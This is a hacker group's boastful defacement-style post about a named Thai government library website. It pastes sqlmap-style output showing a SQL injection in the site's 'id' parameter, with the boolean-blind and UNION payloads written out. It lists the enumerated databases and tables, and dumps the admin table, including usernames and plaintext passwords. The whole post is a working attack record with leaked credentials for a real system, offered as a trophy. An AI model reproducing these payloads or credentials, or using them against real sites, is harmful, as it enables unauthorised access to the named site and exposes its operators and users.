#Team IHC sorry admin you gonna hacked by team IHC secure your site all data is safe................ (*)Target : library.deqp.go.th Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=130 AND 7103=7103 Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=130 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,97,119,108,58),CHAR(109,74,88,76,69,80,67,102,99,81),CHAR(58,118,107,97,58))# --- available databases [20]: [*] deqp [*] deqpdb [*] doc [*] doc17 [*] doc17010555 [*] doc17040555 [*] doc17130555 [*] doc17210355 [*] doc17220555 [*] doc17260455 [*] eicvcalendar [*] envp [*] information_schema [*] inter_government_news_center [*] library [*] mysql [*] phpmyadmin [*] test [*] vcalendar [*] webdirectory Database: inter_government_news_center [15 tables] +------------------------------+ | admin | | baner | | budget | | buy | | data | | doc | | enature | | govdoc | | goverment | | inter_government_news_center | | news | | sumresult | | theme | | w_detail | | webboard | +------------------------------+ Database: inter_government_news_center Table: admin [4 columns] +----------+--------------+ | Column | Type | +----------+--------------+ | id | int(4) | | level | varchar(255) | | password | varchar(255) | | user | varchar(255) | +----------+--------------+ Database: inter_government_news_center Table: admin [2 entries] +----+-------+---------------+-----------+ | id | level | password | user | +----+-------+---------------+-----------+ | 14 | 1 | password | natthidam | | 1 | 1 | @password!234 | admin | +----+-------+---------------+-----------+ sauzadeace PANJI HITAM DARI TIMUR /.logout /.cyb3r h4ck3r